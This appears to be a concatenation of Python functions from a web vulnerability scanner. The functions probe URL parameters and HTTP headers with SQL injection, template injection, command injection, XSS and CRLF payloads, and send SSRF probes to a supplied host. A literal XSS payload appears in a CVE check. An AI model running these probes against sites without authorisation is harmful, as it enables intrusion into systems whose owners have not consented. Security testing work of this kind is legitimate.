def Post(url): if methods.Post(url) == 1: for param in url.split('?')[1].split('&'): for payload, message in ssti_payloads.items(): if post_data(urlparse(url).query) == 0: break r = nq.Post( url.split('?')[0], post_data(urlparse(url).query)) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) data = urlparse(url.replace(param, param + payload)).query req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): bug = { 'name': 'template injection', 'payload': payload, 'method': 'POST', 'parameter': param, 'target': url.split('?')[0], 'data': data } show.bug(bug='template injection', payload=payload, method='POST', parameter=param, target=url.split('?')[0], link=data) return bug return None
def Post(url): for param in url.split('?')[1].split('&'): for payload in sqli_payloads: d = post_data(urlparse(url).query) if d == 0: break r = nq.Post(url, post_data(urlparse(url).query)) if r == 0: break save_request.save(r) data = urlparse(url.replace(param, param + payload)).query req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break for n, e in sql_err.items(): r = findall(e.encode('utf-8'), save_request.get().content) r2 = findall(e.encode('utf-8'), req.content) if len(r) < len(r2): bug = { 'name': 'SQL injection', 'payload': payload, 'method': 'POST', 'parameter': param, 'target': url.split('?')[0], 'data': data } show.bug(bug='SQL injection', payload=payload, method='POST', parameter=param, target=url.split('?')[0], link=data) return bug return None
def Post(url): mt = methods.Post(url.split('?')[0], urlparse(url).query) if mt == 0: pass elif mt == 1 and refxss.Post(url) == 1: for param in url.split('?')[1].split('&'): for payload in xss_payloads: data = urlparse(url.replace(param, param + payload)).query d = post_data(data) if d == 0: break req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break if payload.encode('utf-8') in req.content: bug = { 'name': 'Corss-site scripting', 'payload': payload, 'method': 'POST', 'parameter': param, 'target': url.split('?')[0], 'data': data } show.bug(bug='Cross-site scripting', payload=payload, method='POST', parameter=param, target=url.split('?')[0], link=data) return bug return None
def Post(url,data=None): try: if nq.Post(url.split('?')[0],post_data(urlparse(url).query)).status_code != 405: return 1 else: return 0 except: return 0
def NEON_CVE(url): urls = add_path(url) for u in urls: r = nq.Post(u, post_data('q=<img src=x onerror=alert(1)>')) if '<img src=x onerror=alert(1)>'.encode('utf-8') in r.content: show.bug(bug='Cross-site scripting', payload='<img src=x onerror=alert(1)>', method='GET', parameter='q', target=u, link='q=<img src=x onerror=alert(1)>')
def Post(url): try: for param in url.split('?')[1].split('&'): url = url.replace(param, f'{param}scantrrr') r = nq.Post(url.split('?')[0],post_data(url)) if r.content.decode().lower().find('scantrrr') != -1: return 1 else: return 0 except: return 0
def GO(url,host): d = "?r="+urlencoder(f'{host}/r') # print(d) l = len(ssrf_parameters) for par in ssrf_parameters: pay = urlencoder(f'{host}/{par}') d += f'&{par}={pay}' # print(d) if len(d) > l*3: nq.Get(d) nq.Post(url.split('?')[0],urlparse(d).query) d = f"{url.split('?')[0]}?r={host}/r"
def Post(url): for param in url.split('?')[1].split('&'): for payload, message in rce_payloads.items(): if post_data(urlparse(url).query) == 0: break r = nq.Post(url.split('?')[0], post_data(urlparse(url).query)) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) data = urlparse(url.replace(param, param + payload)).query req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): show.bug(bug='command injection', payload=payload.replace('\n', '%0a'), method='POST', parameter=param, target=url.split('?')[0], link=data.replace('\n', '%0a')) break
def Post(url): try: for param in url.split('?')[1].split('&'): url = url.replace(param, f'{param}scantrrr') r = nq.Post(url.split('?')[0],post_data(url)) for header,value in r.headers.items(): if 'scantrrr' in header or 'scantrrr' in value: return 1 else: return 0 except: return 0
def Post(url): for param in url.split('?')[1].split('&'): for payload in xss_payloads: data = urlparse(url.replace(param, param + payload)).query d = post_data(data) if d == 0: break req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break if payload.encode('utf-8') in req.content: show.bug(bug='Cross-site scripting', payload=payload, method='POST', parameter=param, target=url.split('?')[0], link=data) break
def Post(url): d = nq.Dump() for header in SCAN_Headers: for payload in sqli_payloads: all_headers = {} try: url.split('?')[1].split('&') data = urlparse(url).query data = post_data(data) if data == 0: data = {} except: data = {} r = nq.Post(url, data) if r == 0: break save_request.save(r) try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url.split('?')[0], data=data, method='POST', headers=all_headers) if req == 0: break for n, e in sql_err.items(): r = findall(e.encode('utf-8'), save_request.get().content) r2 = findall(e.encode('utf-8'), req.content) if len(r) < len(r2): show.bug_Header(bug='SQL injection', payload=payload, method='POST', header=header, target=url) break
def Post(url): d = nq.Dump() for header in SCAN_Headers: for payload, message in rce_payloads.items(): all_headers = {} payload = payload.replace('\n', '%0a') try: url.split('?')[1].split('&') data = urlparse(url).query data = post_data(data) if data == 0: data = {} except: data = {} r = nq.Post(url.split('?')[0], data) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url.split('?')[0], data=data, method='POST', headers=all_headers) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): show.bug_Header(bug='command injection', payload=payload.replace('\n', '%0a'), method='POST', header=header, target=url) break
def GO(url, host): l = len(ssrf_parameters) newurl = url for par in ssrf_parameters: pay = f'{host}/{par}' if newurl != url: if len(urlparse(newurl).query) > 0: newurl += f'&{par}={pay}' else: newurl += f'?{par}={pay}' else: if len(urlparse(url).query) > 0: newurl += f'&{par}={pay}' else: newurl += f'?{par}={pay}' if len(urlparse(newurl).query.split( '=')) == parameters_in_one_request + 1: nq.Get(newurl) nq.Post(url.split('?')[0], post_data(urlparse(newurl).query)) newurl = url
def inject(host): for param in host.split('?')[1].split('&'): done = 0 for payload in payloads: r = nq.Get(host.replace(param,param + payload)) if r != 0: for header,value in r.headers.items(): if header == 'Header-Test': if value == 'BLATRUC': print(f'[{green}CRLF{rest}] Found :> {host.replace(param,param + payload)}') done = 1 if done == 1: break for param in host.split('?')[1].split('&'): done = 0 for payload in payloads: data = urlparse(host.replace(param,param + payload)).query d = post_data(data) r = nq.Post(host.split('?')[0],d) if r != 0: for header,value in r.headers.items(): if header == 'Header-Test': if value == 'BLATRUC': print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> POST\n{info} Data :> {data}') done = 1 if done == 1: break for param in host.split('?')[1].split('&'): done = 0 for payload in payloads: data = urlparse(host.replace(param,param + payload)).query d = post_data(data) r = nq.Put(host.split('?')[0],d) if r != 0: for header,value in r.headers.items(): if header == 'Header-Test': if value == 'BLATRUC': print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> PUT\n{info} Data :> {data}') done = 1 if done == 1: break
def GO(url, host): for par in ssrf_parameters: nq.Get(f"{url.split('?')[0]}/?{par}={host}/{par}") nq.Post(url.split('?')[0], post_data(f'{par}={host}/{par}')) nq.Put(url.split('?')[0], post_data(f'{par}={host}/{par}'))